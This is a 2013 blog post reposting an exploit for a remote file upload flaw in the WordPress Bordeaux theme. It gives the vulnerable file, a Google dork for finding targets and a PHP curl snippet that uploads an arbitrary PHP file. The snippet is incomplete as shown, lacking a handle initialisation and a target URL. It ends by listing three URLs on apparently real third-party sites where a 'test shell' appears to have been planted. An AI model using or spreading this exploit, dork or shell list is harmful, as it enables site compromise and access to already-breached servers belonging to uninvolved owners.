Thursday, November 21, 2013

WordPress Bordeaux-Theme Themes Remote File Upload Vulnerability


By on 3:26 AM

##############################################################################
# Exploit Title: WordPress bordeaux-theme Themes Remote File Upload Vulnerability
# Author: iskorpitx
# Date: 12/11/2013
# Vendor Homepage: http://www.orange-themes.com/
# Themes Link: http://www.orange-themes.com/portfolio/bordeaux/
# Infected File: upload-handler.php
# Category: webapps
# Google dork: "/wp-content/themes/bordeaux-theme/"
# Tested on : Windows/Linux
##############################################################################
 
# Exploit
 
 
<?php
$uploadfile="upload.php";
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
        array('orange_themes'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
 
http://127.0.0.1/wordpress/wp-content/uploads/2013/11/upload.php
 
 
_________________________________
 
All http://www.mavi1.org members
 
 
---
test shell
http://asianparivaar.com/wp-content/uploads/2013/11/ttt.php
http://buyafricanmango.co.uk/wp-content/uploads/2013/11/ttt.php
http://cococabanarestaurant.com/wp-content/uploads/2013/11/ttt.php

About Syed Faizan Ali

Faizan is a 17 year old young guy who is blessed with the art of Blogging,He love to Blog day in and day out,He is a Website Designer and a Certified Graphics Designer.